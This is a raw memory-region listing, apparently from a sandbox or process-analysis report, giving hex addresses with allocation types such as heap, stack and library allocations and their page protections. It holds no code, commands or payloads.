page read and write
7A30000
heap
page read and write
2CAE000
heap
page read and write
68C9E000
unkown
page read and write
7A70000
trusted library allocation
page execute and read and write
9B000
stack
page read and write
5D0000
heap
page read and write
12E4000
heap
page read and write
1320000
trusted library allocation
page read and write
5E04000
heap
page read and write
4225000
trusted library allocation
page read and write
2E91000
heap
page read and write
36B0000
heap
page read and write
43B7000
trusted library allocation
page read and write
13AB000
trusted library allocation
page read and write
266E000
stack
page read and write
5DC2000
heap
page read and write
5E04000
heap
page read and write
2C85000
heap
page read and write
5CEF000
stack
page read and write
56CB000
trusted library allocation
page read and write
5CB000
heap
page read and write
C61000
unkown
page execute read
5DC7000
heap
page read and write
6E0000
heap
page read and write
262C2000000
heap
page read and write
54D000
stack
page read and write
77B000
unkown
page write copy
347F000
stack
page read and write
CD1000
heap
page read and write
2F8F000
heap
page read and write
400000
unkown
page readonly
4265000
heap
page execute and read and write
530000
heap
page read and write
5E06000
heap
page read and write
14A4000
heap
page read and write
3205000
trusted library allocation
page read and write
2E91000
heap
page read and write
EB7000
heap
page read and write
2924000
heap
page read and write
3526000
heap
page read and write
32D1000
heap
page read and write
2924000
heap
page read and write
6190000
trusted library allocation
page read and write
3444000
heap
page read and write
E0C000
unkown
page readonly
624000
unkown
page execute and read and write
707A000
heap
page read and write
2924000
heap
page read and write
2483C000
heap
page read and write
2F84000
heap
page read and write
67A000
stack
page read and write
BB0000
heap
page read and write
262C10B0000
trusted library allocation
page read and write
450E000
trusted library allocation
page read and write
32FA000
heap
page read and write
2E91000
heap
page read and write
2485C000
heap
page read and write
32D1000
heap
page read and write
262C1320000
heap
page read and write
7830000
trusted library allocation
page execute and read and write
5DF000
heap
page read and write
370E000
stack
page read and write
ECF000
heap
page read and write
283A000
direct allocation
page read and write
24840000
heap
page read and write
262C1315000
heap
page read and write
460000
heap
page read and write
2BA4000
unkown
page read and write
7120000
trusted library allocation
page execute and read and write
4DEF000
stack
page read and write
3761B000
heap
page read and write
2E91000
heap
page read and write
539C000
trusted library allocation
page read and write
72E0000
trusted library allocation
page execute and read and write
2E91000
heap
page read and write
5DC2000
heap
page read and write
7880000
trusted library allocation
page read and write
5DB3000
heap
page read and write
59C000
stack
page read and write
401000
unkown
page execute read
5B0000
heap
page read and write
D0B000
heap
page read and write
EBD000
heap
page read and write
262C2320000
heap
page read and write
2EA0000
heap
page read and write
14A4000
heap
page read and write
43DE000
stack
page read and write
329C000
trusted library allocation
page read and write
2C83000
heap
page read and write
262BD020000
trusted library allocation
page read and write
19D000
stack
page read and write
78E0000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
24840000
heap
page read and write
31E4000
trusted library allocation
page read and write
61A0000
trusted library allocation
page execute and read and write
CD4000
heap
page read and write
2F8F000
heap
page read and write
5D5A000
heap
page read and write
F18000
heap
page read and write
4E2E000
stack
page read and write
3325000
trusted library allocation
page read and write
5DC8000
heap
page read and write
2924000
heap
page read and write
7657B7E000
stack
page read and write
31D0000
heap
page read and write
34A3000
trusted library allocation
page read and write
5DC4000
heap
page read and write
2A00000
heap
page read and write
2C93000
heap
page read and write
443C000
trusted library allocation
page read and write
14EF000
stack
page read and write
E01000
unkown
page readonly
51ED000
direct allocation
page read and write
42F8000
trusted library allocation
page read and write
12E4000
heap
page read and write
61E00000
direct allocation
page execute and read and write
12E4000
heap
page read and write
68C34000
unkown
page read and write
262C12D7000
heap
page read and write
2F40000
heap
page read and write
2833000
direct allocation
page read and write
BC0000
direct allocation
page execute and read and write
686E4000
unkown
page read and write
586F000
stack
page read and write
273F000
direct allocation
page read and write
2FF0000
heap
page read and write
31C0000
heap
page read and write
5BBE000
stack
page read and write
C6F000
stack
page read and write
5E02000
heap
page read and write
809000
unkown
page write copy
6FB000
heap
page read and write
5D78000
heap
page read and write
6C50000
trusted library allocation
page execute and read and write
8D7000
heap
page read and write
313C000
heap
page read and write
6FFE000
stack
page read and write
2E98000
heap
page read and write
1E4BD000
stack
page read and write
2F8F000
heap
page read and write
2E91000
heap
page read and write
37BE4000
heap
page read and write
2C52000
heap
page read and write
809000
unkown
page read and write
6469000
trusted library allocation
page read and write
627000
heap
page read and write
2E91000
heap
page read and write
61E0000
trusted library allocation
page read and write
2924000
heap
page read and write
4250000
heap
page read and write
2F8D000
heap
page read and write
5E04000
heap
page read and write
DFF000
unkown
page execute and write copy
1F86000
heap
page read and write
7656B7E000
stack
page read and write
40A0000
heap
page read and write
4CA0000
heap
page read and write
7A50000
trusted library allocation
page read and write
2F90000
heap
page read and write
71EB000
stack
page read and write
1608000
heap
page read and write
6FB000
heap
page read and write
2ABC000
stack
page read and write
47DD000
trusted library allocation
page read and write
47D0000
heap
page read and write
33E0000
heap
page read and write
706B000
stack
page read and write
2924000
heap
page read and write
5D5D000
heap
page read and write
344F000
stack
page read and write
5D78000
heap
page read and write
686DD000
unkown
page read and write
2E91000
heap
page read and write
4378000
trusted library allocation
page read and write
E0C000
unkown
page readonly
5DCA000
heap
page read and write
2483F000
heap
page read and write
262BBD13000
heap
page read and write
7860000
trusted library allocation
page read and write
3245000
trusted library allocation
page execute and read and write
E0C000
unkown
page readonly
430000
heap
page read and write
2A0D000
heap
page read and write
1F0000
heap
page read and write
37BC6000
heap
page read and write
134D000
trusted library allocation
page execute and read and write
32D0000
heap
page read and write
D2A000
heap
page read and write
2E90000
heap
page read and write
6240000
trusted library allocation
page read and write
42F3000
heap
page read and write
C61000
unkown
page execute read
2EFF000
stack
page read and write
12E4000
heap
page read and write
CCF000
heap
page read and write
41BD000
trusted library allocation
page read and write
2BB0000
heap
page read and write
15AF000
stack
page read and write
34F8000
trusted library allocation
page read and write
778E000
stack
page read and write
4268000
trusted library allocation
page read and write
E01000
unkown
page readonly
42B9000
trusted library allocation
page read and write
2483C000
heap
page read and write
D17000
heap
page read and write
74C000
stack
page read and write
2BA4000
unkown
page read and write
3300000
heap
page read and write
41C000
unkown
page execute read
43C2000
trusted library allocation
page read and write
2924000
heap
page read and write
418C000
trusted library allocation
page read and write
E50000
heap
page read and write
19A000
stack
page read and write
EE2000
heap
page read and write
654000
heap
page read and write
3308000
heap
page read and write
2C4B000
heap
page read and write
5DE0000
heap
page read and write
27BF000
direct allocation
page read and write
CB4000
heap
page read and write
EB8000
heap
page read and write
731E000
stack
page read and write
7573000
heap
page read and write
CEA000
heap
page read and write
2BDF000
stack
page read and write
2485C000
heap
page read and write
5D60000
trusted library allocation
page read and write
566E000
unkown
page read and write
3229000
trusted library allocation
page read and write
5DD2000
heap
page read and write
601000
heap
page read and write
780000
direct allocation
page read and write
3143000
heap
page read and write
597D000
stack
page read and write
14A4000
heap
page read and write
D3D000
stack
page read and write
5E67000
heap
page read and write
673E000
stack
page read and write
37FC000
trusted library allocation
page read and write
2F70000
heap
page read and write
DF0000
heap
page read and write
2483A000
heap
page read and write
CAE000
stack
page read and write
1E1E000
stack
page read and write
30B0000
heap
page read and write
445000
unkown
page readonly
5E06000
heap
page read and write
4BFE000
stack
page read and write
148D000
heap
page read and write
6C60000
trusted library allocation
page read and write
56C0000
trusted library allocation
page read and write
262C1200000
trusted library allocation
page read and write
42B7000
heap
page read and write
2924000
heap
page read and write
739E000
stack
page read and write
6E0000
heap
page read and write
262C125C000
heap
page read and write
41C5000
heap
page read and write
338F000
trusted library allocation
page read and write
E00000
unkown
page execute and read and write
5FE000
heap
page read and write
722D000
stack
page read and write
E9B000
heap
page read and write
2E91000
heap
page read and write
29DF000
stack
page read and write
7658AFE000
stack
page read and write
3550000
heap
page read and write
262C122C000
heap
page read and write
2B15000
unkown
page read and write
1055000
heap
page read and write
76A000
unkown
page read and write
2E91000
heap
page read and write
C80000
heap
page read and write
C90000
heap
page read and write
34ED000
trusted library allocation
page read and write
1E770000
trusted library allocation
page read and write
2CB3000
heap
page read and write
1600000
heap
page read and write
262BBC8D000
heap
page read and write
68C2D000
unkown
page read and write
8E0000
heap
page read and write
2E4E000
stack
page read and write
3360000
heap
page read and write
142C000
heap
page read and write
7900000
trusted library allocation
page read and write
7658B7E000
unkown
page readonly
2483A000
heap
page read and write
678E000
stack
page read and write
2FBF000
stack
page read and write
42EE000
heap
page read and write
4890000
trusted library allocation
page read and write
4043000
unkown
page read and write
38CE000
trusted library allocation
page read and write
2CA0000
heap
page read and write
EB4000
heap
page read and write
3220000
heap
page read and write
850000
heap
page read and write
2E91000
heap
page read and write
2BAF000
stack
page read and write
3335000
trusted library allocation
page read and write
1678000
trusted library allocation
page read and write
60C000
heap
page read and write
D3B000
heap
page read and write
68697000
unkown
page readonly
69D000
heap
page read and write
61F0000
trusted library allocation
page read and write
2E91000
heap
page read and write
2484E000
heap
page read and write
FB9000
stack
page read and write
2924000
heap
page read and write
2C93000
heap
page read and write
A90000
heap
page read and write
276D000
direct allocation
page read and write
3422000
trusted library allocation
page read and write
DFF000
unkown
page execute and write copy
2CE1000
unkown
page read and write
16E0000
trusted library allocation
page read and write
283E000
stack
page read and write
13C0000
heap
page read and write
2848000
direct allocation
page read and write
2ED0000
remote allocation
page read and write
765737B000
stack
page read and write
423000
unkown
page read and write
696E000
stack
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
2924000
heap
page read and write
12FB000
stack
page read and write
7FD0000
heap
page read and write
2924000
heap
page read and write
7F030000
trusted library allocation
page execute and read and write
32EE000
stack
page read and write
2BA4000
unkown
page read and write
33C0000
trusted library allocation
page read and write
262BC527000
heap
page read and write
675000
heap
page read and write
3750000
trusted library allocation
page read and write
19A000
stack
page read and write
4137000
heap
page read and write
2E1F000
stack
page read and write
344A000
heap
page read and write
6230000
trusted library allocation
page read and write
31F1000
trusted library allocation
page read and write
770000
heap
page read and write
6B4000
heap
page read and write
78F0000
trusted library allocation
page read and write
4022000
unkown
page readonly
78B0000
trusted library allocation
page read and write
3212000
heap
page read and write
5E6B000
heap
page read and write
5DC2000
heap
page read and write
105D6000
direct allocation
page readonly
2483C000
heap
page read and write
3098000
trusted library allocation
page read and write
1797000
heap
page read and write
590000
heap
page read and write
7657CFE000
unkown
page readonly
303F000
stack
page read and write
2EFD000
stack
page read and write
5DB4000
heap
page read and write
D30000
heap
page read and write
416E000
trusted library allocation
page read and write
4237000
trusted library allocation
page read and write
790000
unkown
page readonly
7657D7E000
unkown
page readonly
4305000
trusted library allocation
page read and write
262BC55C000
heap
page read and write
2A8C9000
heap
page read and write
3D0F000
stack
page read and write
AFF000
stack
page read and write
31CB000
heap
page read and write
1E670000
heap
page read and write
457000
unkown
page read and write
EFA000
heap
page read and write
740000
heap
page read and write
60AE000
stack
page read and write
ECC000
heap
page read and write
1F6E000
stack
page read and write
637000
heap
page read and write
262BC51B000
heap
page read and write
246EA000
heap
page read and write
2924000
heap
page read and write
EA0000
heap
page read and write
4317000
trusted library allocation
page read and write
19C000
stack
page read and write
BDC000
stack
page read and write
C60000
unkown
page readonly
262C10D0000
trusted library allocation
page read and write
5DC4000
heap
page read and write
248C0000
heap
page read and write
7656A7E000
unkown
page readonly
37BDA000
heap
page read and write
6980000
trusted library allocation
page read and write
70AE000
stack
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
610000
heap
page read and write
5EE3000
heap
page read and write
262BC59C000
heap
page read and write
2E91000
heap
page read and write
24840000
heap
page read and write
309C4000
heap
page read and write
2924000
heap
page read and write
F18000
heap
page read and write
2A8C5000
heap
page read and write
4154000
trusted library allocation
page read and write
262C1120000
trusted library allocation
page read and write
148E000
stack
page read and write
2E91000
heap
page read and write
1E25E000
stack
page read and write
5D00000
direct allocation
page read and write
5DAF000
heap
page read and write
262BCC90000
trusted library section
page readonly
5582000
trusted library allocation
page read and write
75E000
unkown
page write copy
2E91000
heap
page read and write
3568000
heap
page read and write
699000
stack
page read and write
51DE000
stack
page read and write
35B9000
trusted library allocation
page read and write
12E4000
heap
page read and write
1697000
heap
page read and write
5DBA000
heap
page read and write
2E10000
heap
page read and write
277B000
direct allocation
page read and write
47D9000
trusted library allocation
page read and write
6680000
trusted library allocation
page execute and read and write
61D0000
heap
page read and write
5B7E000
stack
page read and write
2484E000
heap
page read and write
1875000
heap
page read and write
660000
heap
page read and write
5DB2000
heap
page read and write
262BBC5B000
heap
page read and write
3220000
trusted library allocation
page read and write
148B000
heap
page read and write
2F9C000
stack
page read and write
56B4000
trusted library allocation
page read and write
248BF000
heap
page read and write
5E5000
heap
page read and write
40A5000
heap
page read and write
645C000
stack
page read and write
4F5000
stack
page read and write
411000
unkown
page readonly
88E000
stack
page read and write
411000
unkown
page readonly
3131000
trusted library allocation
page read and write
5DC9000
heap
page read and write
37BAD000
heap
page read and write
5DCA000
heap
page read and write
4E7F000
stack
page read and write
2BFF000
stack
page read and write
5DC6000
heap
page read and write
262BBC96000
heap
page read and write
197000
stack
page read and write
262C1345000
heap
page read and write
6B0000
heap
page read and write
3460000
heap
page read and write
EEA000
heap
page read and write
2FD0000
heap
page read and write
5DCB000
heap
page read and write
E01000
unkown
page readonly
2E91000
heap
page read and write
61ED4000
direct allocation
page readonly
309D4000
heap
page read and write
580000
heap
page read and write
5DB2000
heap
page read and write
2BA4000
unkown
page read and write
37BF3000
heap
page read and write
2A916000
heap
page read and write
2E91000
heap
page read and write
2485C000
heap
page read and write
80A000
unkown
page write copy
61ECD000
direct allocation
page readonly
2CB4000
heap
page read and write
AA5000
heap
page read and write
24858000
heap
page read and write
709F000
stack
page read and write
262C1020000
trusted library allocation
page read and write
4D2E000
stack
page read and write
52CC000
stack
page read and write
40CE000
heap
page read and write
33D7000
heap
page read and write
2724000
direct allocation
page read and write
C61000
unkown
page execute read
5EF2000
heap
page read and write
1B2C000
stack
page read and write
2F90000
trusted library allocation
page read and write
598E000
stack
page read and write
13FB000
heap
page read and write
EA0000
heap
page read and write
31F0000
trusted library allocation
page execute and read and write
262BCC70000
trusted library section
page readonly
33B0000
heap
page read and write
4BBE000
stack
page read and write
5EED000
heap
page read and write
5DC2000
heap
page read and write
66D000
heap
page read and write
37BA3000
heap
page read and write
262BC500000
heap
page read and write
32F2000
heap
page read and write
24843000
heap
page read and write
2F8C000
heap
page read and write
2E91000
heap
page read and write
3213000
trusted library allocation
page execute and read and write
5DAF000
heap
page read and write
5DBC000
heap
page read and write
12E6000
heap
page read and write
2924000
heap
page read and write
24850000
heap
page read and write
38D6000
trusted library allocation
page read and write
B20000
heap
page read and write
2FE0000
trusted library allocation
page read and write
7587000
heap
page read and write
DFF000
unkown
page execute and write copy
5DCB000
heap
page read and write
1C6E000
stack
page read and write
8CF000
stack
page read and write
56F0000
trusted library allocation
page read and write
273C000
direct allocation
page read and write
FEF50000
trusted library allocation
page execute and read and write
2BA4000
unkown
page read and write
7539000
heap
page read and write
3212000
heap
page read and write
2860000
heap
page read and write
56D0000
trusted library allocation
page read and write
EC6000
heap
page read and write
647F000
trusted library allocation
page read and write
3545000
trusted library allocation
page read and write
425A000
heap
page read and write
76E000
stack
page read and write
2768000
direct allocation
page read and write
83F000
stack
page read and write
EBD000
heap
page read and write
3012000
trusted library allocation
page read and write
DFF000
unkown
page execute and write copy
5ED1000
heap
page read and write
2FD0000
trusted library allocation
page read and write
50C0000
direct allocation
page read and write
3446000
heap
page read and write
2A8B2000
heap
page read and write
3217000
heap
page read and write
D40000
heap
page read and write
2924000
heap
page read and write
262BC400000
heap
page read and write
42C0000
trusted library allocation
page read and write
76D000
unkown
page read and write
2ADE000
stack
page read and write
4B6F000
unkown
page read and write
24833000
heap
page read and write
400000
unkown
page readonly
419C000
trusted library allocation
page read and write
4259000
trusted library allocation
page read and write
347B000
trusted library allocation
page read and write
494D000
unkown
page read and write
6019000
trusted library allocation
page read and write
2924000
heap
page read and write
32A2000
trusted library allocation
page read and write
2478A000
heap
page read and write
2F87000
heap
page read and write
5E02000
heap
page read and write
649E000
stack
page read and write
263B000
stack
page read and write
5E02000
heap
page read and write
24826000
heap
page read and write
2E91000
heap
page read and write
1414000
heap
page read and write
4C92000
unkown
page read and write
262C1180000
trusted library allocation
page read and write
6060000
heap
page execute and read and write
24840000
heap
page read and write
262BBAF0000
heap
page read and write
5146000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
5E0000
heap
page read and write
27B1000
direct allocation
page read and write
362D000
trusted library allocation
page read and write
2CB4000
heap
page read and write
5D4D000
heap
page read and write
7D3D000
stack
page read and write
5D60000
heap
page read and write
CC1000
heap
page read and write
6620000
trusted library allocation
page read and write
37BCB000
heap
page read and write
262C10BB000
trusted library allocation
page read and write
5DC8000
heap
page read and write
262C1200000
heap
page read and write
4070000
heap
page read and write
2FF9000
trusted library allocation
page read and write
2E91000
heap
page read and write
6210000
trusted library allocation
page read and write
33A0000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
2924000
heap
page read and write
31D8000
trusted library allocation
page read and write
1605000
heap
page read and write
5A3E000
stack
page read and write
10001000
direct allocation
page execute read
400000
unkown
page readonly
425E000
heap
page read and write
2F88000
heap
page read and write
6650000
trusted library allocation
page execute and read and write
7516000
heap
page read and write
2924000
heap
page read and write
73E0000
heap
page read and write
262BBC2B000
heap
page read and write
42F1000
trusted library allocation
page read and write
334E000
stack
page read and write
EC7000
heap
page read and write
688F000
stack
page read and write
2483D000
heap
page read and write
565D000
stack
page read and write
2924000
heap
page read and write
3649000
trusted library allocation
page read and write
3538000
trusted library allocation
page read and write
2FC8000
heap
page read and write
27E0000
heap
page read and write
12E4000
heap
page read and write
4F20000
heap
page read and write
27EB000
direct allocation
page read and write
5FF9000
trusted library allocation
page read and write
2C6A000
heap
page read and write
33C1000
trusted library allocation
page read and write
262C1650000
trusted library allocation
page read and write
73DF000
stack
page read and write
1100000
unkown
page readonly
105D6000
direct allocation
page readonly
68C37000
unkown
page readonly
365F000
trusted library allocation
page read and write
5DC2000
heap
page read and write
191000
stack
page read and write
5DC9000
heap
page read and write
2BA4000
unkown
page read and write
408000
unkown
page readonly
5491000
unkown
page read and write
5E0F000
heap
page read and write
1440000
heap
page read and write
2710000
direct allocation
page read and write
321C000
trusted library allocation
page read and write
2E91000
heap
page read and write
EA4000
heap
page read and write
5DD2000
heap
page read and write
318E000
stack
page read and write
37BD5000
heap
page read and write
601000
heap
page read and write
64FE000
stack
page read and write
31C2000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
16FE000
trusted library allocation
page read and write
CEE000
heap
page read and write
289B000
stack
page read and write
E84000
heap
page read and write
184E000
stack
page read and write
2924000
heap
page read and write
DD0000
heap
page read and write
2924000
heap
page read and write
2E91000
heap
page read and write
18E0000
heap
page read and write
3533000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
4F8000
stack
page read and write
E70000
unkown
page write copy
5DAF000
heap
page read and write
504A000
trusted library allocation
page read and write
427000
unkown
page readonly
CE6000
heap
page read and write
3222000
heap
page read and write
2746000
direct allocation
page read and write
2924000
heap
page read and write
5E0000
heap
page read and write
41E000
unkown
page write copy
425F000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
EAD000
heap
page read and write
3757B000
stack
page read and write
30DC000
heap
page read and write
2C4F000
heap
page read and write
3178000
heap
page read and write
72B0000
trusted library allocation
page read and write
262C10F4000
trusted library allocation
page read and write
2924000
heap
page read and write
24840000
heap
page read and write
262C1286000
heap
page read and write
2924000
heap
page read and write
68C8D000
unkown
page readonly
408000
unkown
page readonly
24828000
heap
page read and write
4338000
trusted library allocation
page read and write
5700000
trusted library allocation
page execute and read and write
10000000
direct allocation
page read and write
24838000
heap
page read and write
E9C000
heap
page read and write
2EB3000
heap
page read and write
5D62000
trusted library allocation
page read and write
2E91000
heap
page read and write
43C000
stack
page read and write
35ED000
trusted library allocation
page read and write
360B000
trusted library allocation
page read and write
3570000
trusted library allocation
page read and write
5E02000
heap
page read and write
58AE000
stack
page read and write
27DC000
direct allocation
page read and write
2E91000
heap
page read and write
13E8000
heap
page read and write
12E0000
heap
page read and write
630000
heap
page read and write
413D000
trusted library allocation
page read and write
FCE000
stack
page read and write
DFB000
unkown
page read and write
A00000
heap
page read and write
3090000
trusted library allocation
page read and write
66B0000
trusted library allocation
page execute and read and write
EC3000
heap
page read and write
2F00000
heap
page read and write
5E03000
heap
page read and write
5DDE000
heap
page read and write
4145000
trusted library allocation
page read and write
3526000
trusted library allocation
page read and write
408E000
stack
page read and write
5DCF000
heap
page read and write
2AA3000
heap
page read and write
4E30000
heap
page read and write
66B000
heap
page read and write
2E91000
heap
page read and write
E70000
unkown
page read and write
7000000
heap
page read and write
690000
heap
page read and write
74B2000
heap
page read and write
1E6F000
stack
page read and write
1F81000
heap
page read and write
3119000
trusted library allocation
page read and write
38B0000
heap
page read and write
2485C000
heap
page read and write
31CF000
stack
page read and write
24854000
heap
page read and write
7578000
heap
page read and write
2824000
direct allocation
page read and write
34AC000
trusted library allocation
page read and write
E00000
unkown
page execute and read and write
2CB3000
heap
page read and write
1DFBE000
stack
page read and write
1E671000
heap
page read and write
2BA4000
unkown
page read and write
2E6E000
stack
page read and write
2FF0000
trusted library allocation
page read and write
10001000
direct allocation
page execute read
4080000
heap
page read and write
2E91000
heap
page read and write
5DCE000
heap
page read and write
5E02000
heap
page read and write
2483C000
heap
page read and write
9C000
stack
page read and write
6A2000
heap
page read and write
CDB000
heap
page read and write
324E000
stack
page read and write
3000000
unkown
page read and write
774000
unkown
page read and write
41D6000
trusted library allocation
page read and write
3860000
heap
page read and write
37B99000
heap
page read and write
CF8000
heap
page read and write
2E91000
heap
page read and write
374FA000
heap
page read and write
2924000
heap
page read and write
3260000
trusted library allocation
page read and write
E3C000
stack
page read and write
1E20F000
stack
page read and write
D14000
heap
page read and write
2BA4000
unkown
page read and write
2A32000
heap
page read and write
842D000
stack
page read and write
E83000
unkown
page readonly
2924000
heap
page read and write
F0B000
heap
page read and write
CD6000
heap
page read and write
430E000
trusted library allocation
page read and write
5DB5000
heap
page read and write
980000
heap
page read and write
D5B000
stack
page read and write
433F000
heap
page read and write
332F000
trusted library allocation
page read and write
980000
heap
page read and write
E79000
unkown
page write copy
4530000
heap
page read and write
37BFD000
heap
page read and write
5DDE000
heap
page read and write
2E27000
heap
page read and write
2E91000
heap
page read and write
8D0000
heap
page read and write
4191000
trusted library allocation
page read and write
3226000
trusted library allocation
page read and write
2BE7000
heap
page read and write
262C132B000
heap
page read and write
604000
heap
page read and write
5481000
unkown
page read and write
735E000
stack
page read and write
91B000
heap
page read and write
262C1450000
remote allocation
page read and write
2A3E000
heap
page read and write
DF4000
unkown
page read and write
E01000
unkown
page readonly
E01000
unkown
page readonly
16FA000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
53CE000
trusted library allocation
page read and write
EE2000
heap
page read and write
66D000
heap
page read and write
6B0000
unkown
page readonly
2A0F000
stack
page read and write
B3B000
heap
page read and write
675000
heap
page read and write
262C10B0000
trusted library allocation
page read and write
3410000
heap
page execute and read and write
5DDE000
heap
page read and write
765847E000
unkown
page readonly
4230000
heap
page read and write
1362000
trusted library allocation
page read and write
416000
unkown
page read and write
CCB000
heap
page read and write
1706000
trusted library allocation
page read and write
262BC55C000
heap
page read and write
3292000
trusted library allocation
page read and write
68AD1000
unkown
page execute read
DFF000
unkown
page execute and write copy
716C000
stack
page read and write
2924000
heap
page read and write
282C000
direct allocation
page read and write
2E91000
heap
page read and write
2A890000
heap
page read and write
66D000
heap
page read and write
1E3BE000
stack
page read and write
675000
heap
page read and write
702D000
stack
page read and write
309DC000
heap
page read and write
401000
unkown
page execute read
EC6000
heap
page read and write
3295000
heap
page execute and read and write
765757E000
unkown
page readonly
68BE7000
unkown
page readonly
5D31000
heap
page read and write
6C0000
unkown
page readonly
865E000
stack
page read and write
2F4E000
stack
page read and write
41A6000
trusted library allocation
page read and write
303F000
stack
page read and write
990000
heap
page read and write
300F000
stack
page read and write
2E91000
heap
page read and write
439D000
trusted library allocation
page read and write
24820000
heap
page read and write
262BCCA0000
trusted library section
page readonly
262C121F000
heap
page read and write
271D000
direct allocation
page read and write
2BA4000
unkown
page read and write
F10000
heap
page read and write
2E91000
heap
page read and write
C94000
heap
page read and write
E5A000
heap
page read and write
262C10E0000
trusted library allocation
page read and write
582E000
stack
page read and write
2A8B0000
heap
page read and write
58EF000
stack
page read and write
988000
heap
page read and write
34CD000
trusted library allocation
page read and write
37B9E000
heap
page read and write
2720000
direct allocation
page read and write
73E000
stack
page read and write
33BB000
heap
page read and write
2924000
heap
page read and write
2E91000
heap
page read and write
5E4F000
stack
page read and write
5DE0000
heap
page read and write
4271000
trusted library allocation
page read and write
70A7000
heap
page read and write
346C000
trusted library allocation
page read and write
2CB6000
heap
page read and write
2924000
heap
page read and write
306D000
heap
page read and write
690000
heap
page read and write
A70000
heap
page read and write
14A4000
heap
page read and write
1610000
trusted library allocation
page read and write
F18000
heap
page read and write
41B000
unkown
page readonly
267A000
stack
page read and write
36B7000
trusted library allocation
page read and write
5DE0000
heap
page read and write
315F000
trusted library allocation
page read and write
2841000
direct allocation
page read and write
10163000
direct allocation
page read and write
675000
heap
page read and write
68581000
unkown
page execute read
765837B000
stack
page read and write
D10000
heap
page read and write
307E000
stack
page read and write
2BA4000
unkown
page read and write
5DE0000
heap
page read and write
262BBD29000
heap
page read and write
262BD001000
trusted library allocation
page read and write
2F8B000
heap
page read and write
2BE0000
heap
page read and write
313E000
heap
page read and write
2F8F000
stack
page read and write
4CA7000
heap
page read and write
2C86000
heap
page read and write
41BE000
stack
page read and write
3217000
trusted library allocation
page read and write
24838000
heap
page read and write
2E91000
heap
page read and write
6250000
trusted library allocation
page read and write
271B000
direct allocation
page read and write
C5E000
stack
page read and write
309D2000
heap
page read and write
E00000
unkown
page execute and read and write
345F000
stack
page read and write
C61000
unkown
page execute read
2F6C000
stack
page read and write
34FE000
trusted library allocation
page read and write
24840000
heap
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
422C000
trusted library allocation
page read and write
710000
heap
page read and write
37BF8000
heap
page read and write
BAA000
stack
page read and write
40A7000
heap
page read and write
ED6000
heap
page read and write
401000
unkown
page execute read
4A60000
unkown
page read and write
243F000
stack
page read and write
80A000
unkown
page write copy
2E91000
heap
page read and write
77E000
unkown
page read and write
30E8000
heap
page read and write
3DC000
stack
page read and write
37BE9000
heap
page read and write
270C000
heap
page read and write
2FBE000
stack
page read and write
2485C000
heap
page read and write
3121000
heap
page read and write
CC0000
heap
page read and write
3625000
trusted library allocation
page read and write
10163000
direct allocation
page read and write
41E000
unkown
page read and write
549000
unkown
page execute and read and write
2924000
heap
page read and write
32F0000
heap
page read and write
2EFE000
stack
page read and write
765777E000
unkown
page readonly
5E03000
heap
page read and write
5D4E000
stack
page read and write
3503000
trusted library allocation
page read and write
427000
unkown
page readonly
791000
unkown
page execute read
765827E000
unkown
page readonly
4187000
trusted library allocation
page read and write
61D0000
trusted library allocation
page read and write
E83000
unkown
page readonly
53AD000
trusted library allocation
page read and write
ECF000
heap
page read and write
C1C000
stack
page read and write
309CC000
heap
page read and write
2BEE000
unkown
page read and write
36B0000
trusted library allocation
page read and write
2924000
heap
page read and write
32D0000
heap
page read and write
780D000
stack
page read and write
3F11000
heap
page read and write
76574FE000
stack
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
3BE0000
heap
page read and write
686F000
stack
page read and write
7657FFE000
unkown
page readonly
2E91000
heap
page read and write
2830000
heap
page read and write
2E91000
heap
page read and write
5E02000
heap
page read and write
326C000
stack
page read and write
2EAF000
stack
page read and write
307E000
stack
page read and write
2F75000
heap
page read and write
CB0000
heap
page read and write
8B0000
heap
page read and write
2483C000
heap
page read and write
76579FE000
stack
page read and write
214C000
stack
page read and write
E84000
heap
page read and write
5EE0000
heap
page read and write
14A4000
heap
page read and write
2924000
heap
page read and write
262C12FD000
heap
page read and write
2FAC000
stack
page read and write
2C2E000
stack
page read and write
1DE7E000
stack
page read and write
7850000
trusted library allocation
page read and write
41D1000
trusted library allocation
page read and write
2EBE000
stack
page read and write
D39000
heap
page read and write
5DBB000
heap
page read and write
5D6A000
heap
page read and write
2C8A000
heap
page read and write
262BBC7A000
heap
page read and write
1DF7F000
stack
page read and write
314F000
stack
page read and write
3306000
trusted library allocation
page read and write
3247000
trusted library allocation
page execute and read and write
61ECC000
direct allocation
page read and write
61ED0000
direct allocation
page read and write
84C0000
trusted library allocation
page read and write
1E35E000
stack
page read and write
2E91000
heap
page read and write
2F77000
heap
page read and write
31DE000
stack
page read and write
302E000
stack
page read and write
5E60000
heap
page read and write
3448000
heap
page read and write
3654000
trusted library allocation
page read and write
3506000
trusted library allocation
page read and write
262BC513000
heap
page read and write
325D000
stack
page read and write
37600000
heap
page read and write
2F90000
heap
page read and write
1610000
heap
page read and write
2BA4000
unkown
page read and write
3440000
heap
page read and write
262C1256000
heap
page read and write
5D20000
heap
page read and write
2CBB000
heap
page read and write
5E10000
heap
page read and write
E8D000
heap
page read and write
EC4000
heap
page read and write
87E000
unkown
page readonly
363F000
trusted library allocation
page read and write
970000
heap
page read and write
5DD2000
heap
page read and write
2924000
heap
page read and write
EC5000
heap
page read and write
2F8D000
heap
page read and write
87C000
stack
page read and write
5DC000
stack
page read and write
96F000
stack
page read and write
1050000
heap
page read and write
2E91000
heap
page read and write
24850000
heap
page read and write
75C1000
heap
page read and write
2B20000
heap
page read and write
5E6B000
heap
page read and write
24840000
heap
page read and write
2924000
heap
page read and write
27A2000
direct allocation
page read and write
2FE4000
trusted library allocation
page read and write
765817A000
stack
page read and write
69E000
stack
page read and write
4020000
unkown
page read and write
3490000
heap
page read and write
4459000
trusted library allocation
page read and write
313C000
trusted library allocation
page read and write
1658000
heap
page read and write
2924000
heap
page read and write
3070000
heap
page read and write
3447000
heap
page read and write
2808000
direct allocation
page read and write
840000
heap
page read and write
262C1210000
trusted library allocation
page read and write
3317000
heap
page read and write
2E8F000
stack
page read and write
33AE000
stack
page read and write
5E02000
